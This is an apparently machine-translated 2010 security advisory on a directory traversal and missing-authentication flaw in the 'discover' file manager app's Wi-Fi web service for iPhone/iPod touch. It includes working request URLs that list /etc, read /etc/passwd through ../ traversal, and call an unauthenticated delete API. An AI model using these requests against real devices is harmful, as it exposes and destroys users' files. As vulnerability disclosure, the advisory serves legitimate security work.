iphone/ipod discover the File Manager web service directory traversal vulnerability-vulnerability warning-the black bar safety net

2010-06-20T00:00:00
ID MYHACK58:62201027296
Type myhack58
Reporter 佚名
Modified 2010-06-20T00:00:00

Description

from:Xeye Team

discover is an iphone/ipod touch platform on the popular file Manager, can read pdf/office/txt format files

And via wifi to share these files, a detailed description look at this: http://itunes.apple.com/us/app/discover/id292416855?mt=8#

Vulnerability analysis

When the wifi environment of the iphone/ipod touch users open the discover, it will automatically turn on remote web Access, the web interface is flash-made file management interface as in the following figure, and discover there are two directories: Private and Public, in the“settings” - >“file security settings”you can set web Access Password Authentication Type for HTTP Digest, but only to protect Private directory.

!

Due to discover a web Service of some of the api interface does not strictly authenticate the user to access and there is a directory traversal vulnerability, an attacker use the web Services api can access iphone/ipod mobile user permissions on any directory with the file, and you can remove mobile permissions to delete the file.

Exploit

1, First of all we have to list the directory: http://192.168.1.9:8888/list?sort=%27&format=xml&dir=/Public/../../../../../../../etc/&order=asc

!

2, The Read file contents, although I know that our permission is only for mobile, but Read access is still very wide: http://192.168.1.9:8888/web?path=history/../../../../../../../../etc/passwd

!

There is also a delete api: http://192.168.1.9:8888/delete?path=/Private/&format=none

Vulnerability vendor

http://www.mappn.com/community/